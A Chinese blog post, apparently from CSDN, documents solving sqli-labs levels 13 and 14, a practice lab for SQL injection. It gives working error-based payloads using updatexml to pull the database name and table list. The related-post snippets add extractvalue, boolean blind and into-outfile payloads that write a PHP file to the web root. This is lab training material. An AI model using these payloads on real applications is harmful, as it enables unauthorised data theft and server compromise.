sqli-labs注入漏洞解析--less-13/14

于 2024-08-06 09:34:46 发布
阅读量270 收藏 1
点赞数 9
文章标签: sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duoba_an/article/details/140925648
版权

第十三关:

当输入或者不输入信息时显示登录失败,当账号和密码输入admin,显示登录成功

当在用户名输入'时报错了,仔细看报错信息,可以发现他说我密码这里不对,有个单括号,再猜这里可能有注入点

当输入')基本可以判断出这里的闭合方式为’),浅试一下 

嘿,这不就可以了吗  

 使用order by 测回显,当输入1,2时都可以,输入3开始报错

尝试报错函数

') and updatexml(1,concat(1,(select database())),3)#

好像是成功了,再试试

') and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),3)#

接下来就简单了,和之前的一样一样的。。。

第十四关:

这不和之前的一样,换个闭合方式就是一关🤣

Less-13,14(报错注入
m0_62094846的博客
03-30 235
uname=1')#&passwd=1&submit=Submit 正确的不会有显示,错误的会报错 报错注入
Sqli-labs靶场第2关详解[Sqli-labs-less-2]
m0_73615178的博客
02-19 781
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
SQL注入实例(sqli-labs/less-5)
最新发布
Thewei666的博客
08-05 987
在进行前两句传参时,页面没有发生任何变化,但是当使用单引号闭合时,报错了。通过报错可以确定闭合符号为单引号。
SQLI-LABS Less-13Less-14
Web学习之路
03-24 166
联合注入
Sqli-labsLess-13Less-14
→_→
04-05 1288
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
LESS-13
qq_44598397的博客
03-21 430
LESS-13 源码: 输入:admin’,出现错误提示,可以知道sql注入中是用’)闭合。 输入:admin’)# 因为这里有报错,所以可以用报错注入 admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))# 布尔注入: admin’) and left(database(),1)>‘a’#(可以用二分法进...
sqli-labs靶场练习笔记
11-09
>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的时间盲注** - **特点**:通过观察请求响应时间的变化来判断SQL语句的真假。 - **实现方法**:利用`sleep`...
sqli-labs-master1-38靶场教学
qq_49518993的博客
05-17 611
sqli-labs网安入门小游戏 目录 1~22 1~22 1 首先输入游戏idhttp://127.0.0.1/sqli-labs-master/Less-1/?id=1
Sqli-labs靶场第7关详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 2593
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1962
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
Sqli-labs Less13-14 报错型盲注 - POST
kevinhanser
08-09 458
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 13: POST - Double Injection - Single Quotes - with twist 测试漏洞 username 输入 admin' password 输入 任意内容 显示报错信息 You have an error in your SQL syntax; ...
sqlilabs less13~14
TA不懒,但还没有添加简介
07-01 405
sqlilabs less13
SQLi LABS Less-13 报错注入+布尔盲注
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
SQL注入sqli-labsLess 6 - Less 10 练习笔记
全栈纸伞
07-10 841
SQL注入sqli-labsLess 6 - Less 10 练习笔记 Less 6 - 10 这部分的内容基本上和Less 1-5差不多,换汤不换药,如果出现疑惑,可以看看1-5的解释。 0x01 Less 6 简单的说下测试的过程 " // 出现SQL语句错误,说明可以基于报错修改参数,且"闭合方式 id=1" and "1"="1 // 是否出现SQL注入的特征 最后得出
sqli-labs(less-13)
欢迎光临
06-08 967
less-12 可知  通过报错可知  是通过') 闭合的发现没有登入成功返回信息 ...看来是要盲注了...操作就像GET注入一样  只需要改union select 1,2 的信息即可盲注只能考虑sqlmap了......
sql注入中rand()和group by双注入报错(以sqli-labs_Less13为例)
weixin_46145442的博客
11-30 1201
利用rand()重复计数作为group by的对象分组达到主键重复目的,完成双注入报错。
通过sqli-labs学习sql注入——基础挑战之less11-22
热门推荐
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 5466
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4425
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战...通过Sqli-labs的实践,读者可以增强对SQL注入漏洞的识别和防御能力,同时提升对数据库安全的理解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

duoba_an

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值